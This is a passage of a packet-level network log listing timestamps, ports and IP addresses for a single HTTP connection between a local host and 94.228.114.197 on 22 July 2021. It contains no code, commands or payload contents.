Jul 22, 2021 11:28:01.376847029 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.376867056 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.376868963 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.376887083 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.376889944 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.376912117 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.376931906 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.376934052 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.376950979 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.376971960 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.376985073 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.376991034 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.377013922 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.377039909 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.377521038 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.377545118 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.377568960 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.377600908 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.377620935 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.377636909 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.377640009 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.377655983 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.377662897 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.377693892 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.377983093 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.378006935 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.378026962 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.378046036 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.378050089 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.378072977 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.378079891 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.378093004 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.378114939 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.378127098 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.378137112 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.378156900 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.378169060 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.378176928 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.378196955 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.378218889 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.378251076 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.378264904 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.378271103 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.378299952 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.378324986 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.378338099 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.378345966 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.378366947 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.378380060 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.378386974 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.378407955 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.378412008 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.378427982 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.378448963 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.378457069 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.378468037 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.378492117 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.378494024 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.378535986 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.457303047 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.505429983 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:03.861624956 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:03.941293955 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.201690912 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.201760054 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.201800108 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.201838970 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.201878071 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.201915026 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.201936960 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.201956034 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.201973915 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.201978922 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.202001095 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.202037096 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.202060938 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.202078104 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.202152014 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.284043074 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.284065962 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.284081936 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.284101009 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.284121037 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.284138918 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.284152985 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.284168005 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.284187078 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.284205914 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.284224987 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.284245014 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.284248114 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.284269094 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.284287930 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.284295082 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.284302950 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.284322977 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.284344912 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.284351110 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.284365892 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.284384012 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.284384966 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.284404993 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.284465075 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.284485102 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.364020109 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.364080906 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.364125967 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.364175081 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.364217043 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.364255905 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.364363909 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.364367962 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.364412069 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.364439964 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.364478111 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.364556074 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.364562988 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.364603996 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.364640951 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.364665985 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.364713907 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.364748955 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.364783049 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.364819050 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.364857912 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.364882946 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.364922047 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.364964008 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.364984035 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.365022898 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.365077972 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.365086079 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.365124941 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.365164042 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.365214109 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.365228891 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.365288019 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.365292072 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.365335941 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.365377903 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.365406036 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.365443945 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.365504980 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.365519047 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.365547895 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.365586042 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.365602016 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.365643024 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.365684986 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.365690947 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.365721941 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.365763903 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.365770102 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.365812063 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.365849018 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.365873098 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.365886927 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.365923882 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.365925074 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.365962029 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.365998983 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.366013050 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.366080046 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.444992065 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.445058107 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.445101023 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.445142031 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.445180893 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.445219040 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.445255995 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.445293903 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.445343971 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.445391893 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.445434093 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.445472002 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.445509911 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.445549011 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.445588112 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.445620060 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.445637941 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.445677996 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.445704937 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.445717096 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.445717096 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.445758104 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.445796967 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.445799112 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.445843935 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.445858955 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.445885897 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.445923090 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.445955038 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.445960999 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.446000099 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.446017981 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.446037054 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.446074009 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.446111917 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.446132898 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.446156979 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.446176052 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.446199894 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.446237087 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.446261883 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.446274996 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.446311951 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.446338892 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.446348906 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.446387053 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.446398973 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.446424007 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.446479082 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.446562052 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.446604013 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.446640968 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.446664095 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.446681023 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.446717978 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.446732044 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.446753025 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.446790934 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.446804047 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.446826935 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.446873903 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.446883917 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.446914911 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.446952105 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.446965933 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.446990013 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.447026968 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.447057962 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.447062016 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.447099924 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.447155952 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.447180033 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.447216034 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.447233915 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.447262049 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.447304010 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.447319031 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.447340965 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.447377920 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.447415113 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.447416067 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.447451115 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.447464943 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.447489023 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.447525024 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.447557926 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.447570086 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.447612047 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.447627068 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.447649956 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.447688103 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.447725058 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.447727919 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.447761059 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.447779894 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.447798014 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.447834969 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.447858095 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.447880983 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.447922945 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.447930098 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.447959900 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.447997093 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.448030949 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.448034048 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.448070049 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.448082924 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.448108912 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.448143959 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.448174953 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.448190928 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.448232889 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.448246956 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.448270082 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.448339939 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.449636936 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.527931929 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.527973890 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.528009892 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.528048038 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.528095961 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.528152943 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.528177023 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.528183937 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.528218985 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.528223991 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.528253078 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.528264046 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.528301954 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.528337955 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.528345108 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.528376102 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.528393984 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.528413057 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.528460026 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.528462887 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.528501987 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.528522968 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.528539896 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.528578997 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.528616905 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.528640985 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.528654099 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.528692007 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.528697968 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.528729916 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.528775930 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.528779984 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.528819084 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.528856039 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.528893948 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.528903008 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.528932095 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.528969049 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.528985023 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.529006958 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.529043913 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.529057026 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.529090881 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.529105902 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.529131889 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.529160023 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.529169083 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.529207945 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.529242992 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.529246092 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.529282093 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.529320002 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.529331923 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.529356956 CEST	80	49720	94.228.114.197	192.168.2.3
